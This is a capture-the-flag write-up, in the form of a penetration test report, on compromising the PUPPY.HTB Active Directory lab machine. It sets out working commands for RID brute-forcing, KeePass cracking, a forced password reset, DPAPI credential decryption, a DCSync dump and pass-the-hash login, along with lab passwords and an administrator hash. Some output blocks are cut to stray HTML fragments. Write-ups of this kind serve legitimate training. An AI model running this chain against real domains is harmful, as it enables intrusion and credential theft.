# Penetration Testing Report for PUPPY.HTB (10.10.11.70)
# Executive Summary
This report details a penetration test conducted on the target machine at 10.10.11.70, part of the PUPPY.HTB Active Directory domain, from May 22–26, 2025. Using tools such as RustMap, NetExec, BloodHound, keepass4brute, and dpapi.py, the test achieved full administrative access through reconnaissance, credential exploitation, privilege escalation, and a DCSync attack. Key vulnerabilities included weak permissions, unprotected backup files, and an insecure KeePass database.
---
# 1. Initial Reconnaissance
# 1.1 RustMap Scan
A network scan was performed using RustMap (https://github.com/Wael-Rd/RustMap) on May 22, 2025, at 21:56 CEST, combining RustScan for port discovery and Nmap for service enumeration.
Command:
RustMap 10.10.11.70 |
Key Findings:
- **Target**: 10.10.11.70
- **Open Ports**: 53 (DNS), 88 (Kerberos), 111 (rpcbind), 135 (MSRPC), 139 (NetBIOS-SSN), 389 (LDAP), 445 (SMB), 464 (kpasswd5), 593 (HTTP-RPC), 2049 (NFS), 9389 (ADWS), 49664, 49667, 49669, 49670, 49685 (MSRPC).
- **Filtered Ports**: 3, 9, 10, 11, 22, 56, 70, 636, 2025, 49685.
- **Services**:
- DNS: Simple DNS Plus (port 53).
- Kerberos: Microsoft Windows Kerberos (port 88).
- LDAP: Microsoft Windows Active Directory LDAP (port 389, Domain: PUPPY.HTB, Site: Default-First-Site-Name).
- SMB: Microsoft Windows SMB (ports 139, 445).
- NFS: Network File System (port 2049).
- ADWS: Active Directory Web Services (port 9389).
- RPC: Multiple RPC services (ports 49664–49685).
- **OS**: Likely Microsoft Windows Server 2022 (86% confidence).
- **Host Info**: Hostname: DC, Domain: PUPPY.HTB.
Sample Output:
<span style="color:#32CD32;"> |
---
# 2. Initial Access
# 2.1 Provided Credentials
Initial access was facilitated using:
- **Username**: levi.james
- **Password**: KingofAkron2025!
These were added to /etc/hosts for local resolution of PUPPY.HTB.
# 2.2 User Enumeration
Active Directory users were enumerated using NetExec with a RID brute-force attack:
Command:
nxc smb PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt |
Result: A list of domain users was saved to users.txt.
# 2.3 Share Enumeration
SMB shares were enumerated to identify accessible resources:
Command:
crackmapexec smb 10.10.11.70 -u levi.james -p 'KingofAkron2025!' --shares |
Result: Identified a share named DEV, indicating access to development resources.
# 2.4 KeePass Database Cracking
A KeePass database (recovery.kdbx) was retrieved from the DEV SMB share and cracked using the keepass4brute script:
Command:
cat kdb_recovery.txt |
Output:
<span style="color:#32CD32;"> |
Result: The credentials for ant.edwards (Antman2025!) were used for further enumeration.
---
# 3. Active Directory Enumeration
# 3.1 BloodHound Analysis
bloodhound-python was used to map Active Directory relationships and privileges:
Command:
bloodhound-python -dc DC.PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' -d PUPPY.HTB -c All -o bloodhound_results.json -ns 10.10.11.70 |
Findings:
- levi.james is a member of the Developers group with GenericWrite permissions on another account (not immediately exploitable).
- A password spraying attack using passwords_only.txt confirmed the ant.edwards credentials (Antman2025!) from the KeePass database.
# 3.2 Privilege Analysis
The ant.edwards account had write privileges on adam.d.silver:
Command:
bloodyAD --host 10.10.11.70 -d PUPPY.HTB -u ant.edwards -p 'Antman2025!' get writable --detail | grep -E "distinguishedName: CN=.*DC=PUPPY,DC=HTB" -A 10 |
Result: Confirmed ant.edwards could modify adam.d.silver's attributes.
---
# 4. Password Reset and Access Escalation
# 4.1 Password Reset
The password for adam.d.silver was changed to SecurePass2025! using bloodyAD:
Command:
bloodyAD --host 10.10.11.70 -d PUPPY.HTB -u ant.edwards -p 'Antman2025!' set password 'CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB' SecurePass2025! |
Result:
[+] Password changed successfully! |
# 4.2 Account Reactivation
If adam.d.silver was disabled, it was reactivated using an LDIF file:
LDIF Content:
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB |
Command:
ldapmodify -x -H ldap://10.10.11.70 -D "ant.edwards@puppy.htb" -w 'Antman2025!' -f modify.ldif |
# 4.3 Remote Shell
A remote shell was established via WinRM:
Command:
evil-winrm -i 10.10.11.70 -u adam.d.silver -p 'SecurePass2025!' |
Result: Successful shell access as adam.d.silver.
---
# 5. Privilege Escalation
# 5.1 Local Enumeration
Using the adam.d.silver shell, the Backups directory revealed site-backup-2024-12-30.zip. Extracting it yielded nms-auth-config.xml.bak, containing:
- **Username**: steph.cooper
- **Password**: ChefSteph2025!
A new WinRM session was established:
Command:
evil-winrm -i 10.10.11.70 -u steph.cooper -p 'ChefSteph2025!' |
# 5.2 DPAPI Credential Extraction
DPAPI-protected files were identified in the steph.cooper profile:
Command:
cd C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107 |
Output:
Name Attributes LastWriteTime |
A credential blob was found:
Command:
cd C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials |
Output:
Name Attributes LastWriteTime |
File downloads via evil-winrm failed, so a temporary SMB server was used to transfer the files.
# 5.3 DPAPI Decryption
The masterkey 556a2412-1275-4ccf-b721-e6a0b4f90407 was decrypted:
Command:
dpapi.py masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password 'ChefSteph2025!' |
Output:
<span style="color:#32CD32;"> |
The decrypted masterkey extracted credentials from the blob:
- **Username**: steph.cooper_adm
- **Password**: FivethChipOnItsWay2025!
---
# 6. Domain Compromise
# 6.1 DCSync Attack
The steph.cooper_adm account had DCSync privileges, allowing extraction of all Active Directory hashes:
Command:
secretsdump.py 'PUPPY.HTB/steph.cooper_adm:FivethChipOnItsWay2025!@DC.PUPPY.HTB' |
Result: Obtained the NTLM hash for the administrator account:
<span style="color:#32CD32;">bb0edc15e49ceb4120c7bd7e6e65d75b</span> |
# 6.2 Administrative Access
A WinRM session was established using the administrator hash:
Command:
evil-winrm -i 10.10.11.70 -u administrator -H bb0edc15e49ceb4120c7bd7e6e65d75b |
Result: Full administrative access to the domain.
---
# 7. Conclusion and Recommendations
# 7.1 Summary
The penetration test compromised the PUPPY.HTB domain by:
1. Conducting reconnaissance with RustMap to identify services.
2. Enumerating users and shares with NetExec, retrieving recovery.kdbx from the smb shares.
3. Cracking recovery.kdbx with keepass4brute to obtain ant.edwards credentials.
4. Mapping privileges with BloodHound to identify exploitable permissions.
5. Resetting the adam.d.silver password using bloodyAD.
6. Extracting credentials from backups and DPAPI-protected files.
7. Performing a DCSync attack to retrieve the administrator hash.
